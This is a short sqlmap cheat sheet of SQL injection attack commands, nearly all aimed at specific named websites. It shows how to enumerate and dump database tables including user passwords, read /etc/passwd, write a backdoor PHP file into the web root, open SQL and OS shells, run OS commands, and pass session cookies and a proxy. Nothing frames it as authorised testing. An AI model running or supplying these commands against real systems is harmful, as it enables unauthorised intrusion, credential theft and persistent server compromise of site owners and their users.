SqlMap
======

sqlmap -u http://signisasia.net/becomemember.php?id=14 --dbs 	
[Extract Databases]
[Extract Tables from database]
sqlmap -u http://signisasia.net/becomemember.php?id=14 -D database --tables

[Extract Columns of table_name from database]
sqlmap -u http://signisasia.net/becomemember.php?id=14 -D database -T table_name --columns

[Dumping Data]
sqlmap -u http://signisasia.net/becomemember.php?id=14 -D database -T table_name -C colum1,column2,clumn3 --dump



URL WRITING
============

If we have an injection like 
http://signisasia.net/books/1/view
http://signisasia.net/books/2/view
http://signisasia.net/books/3/view

sqlmap -u http://signisasia.net/books/*/view --dbs




					Speeding Up The process
					=======================
Multithreading
--------------
#sqlmap -u http://signisasia.net/books/view.php?id=100 --dbs --threads 5



Null-Connection
---------------
#sqlmap -u http://signisasia.net/books/view.php?id=100 --dbs --null-connection


HTTP Persistant Connection
--------------------------
#sqlmap -u http://signisasia.net/books/view.php?id=100 --dbs --keep-alive


Output prediction
-----------------
#sqlmap -u http://signisasia.net/books/view.php?id=100 -D database -T user -c users,password --dump --predict-output




					File Priveleges
					===============
[Checking privilages]
---------------------
#sqlmap -u http://signisasia.net/books/view.php?id=100 --privileges


[Reading Files from the server]
-------------------------------
#sqlmap -u http://signisasia.net/books/view.php?id=100 --file-read=/etc/passwd


[Uploading Files/Shell]
#sqlmap -u http://signisasia.net/books/view.php?id=100 --file-write=/root/imxx/backdoor.php --file-dest=/var/www/imran.php






					Handling Post Injection
					=======================

[Post injection Direcltly]
--------------------------

#sqlmap -u http://imranparray.com/login.php --data "username=imx&pass=imx100&submit=Submit" -p username

> --data is the post data send in the request
> -p is the injection point.


[Post injection via saved file]
-------------------------------

-Capture the request with httpheader,burpsuite
-Save it to req.txt
#sqlmap -r req.txt -p username


[Using Cookies]
---------------
#sqlmap -u http://imranparray.com/welcom.php --cookie="PHPSESSID=adsaasd56454a6s54d54" -u http://imranparray.com/welcome/functionality.php?id=100





					Getting Shells
					==============

[Sql Shell]
-----------
#sqlmap -u http://imranparray.com/login.php?id=100 --sql-shell


[OS shell]
----------
#sqlmap -u http://imranparray.com/login.php?id=100 --os-shell


[Os Command Exe without Shell Upload]
-------------------------------------
#sqlmap -u http://imranparray.com/login.php?id=100 --os-cmd "uanme -a"


[Using Proxy]
-------------
#sqlmap --proxy="127.0.0.1:8888" -u https://imranparray.com/home.php?id=12 --dbs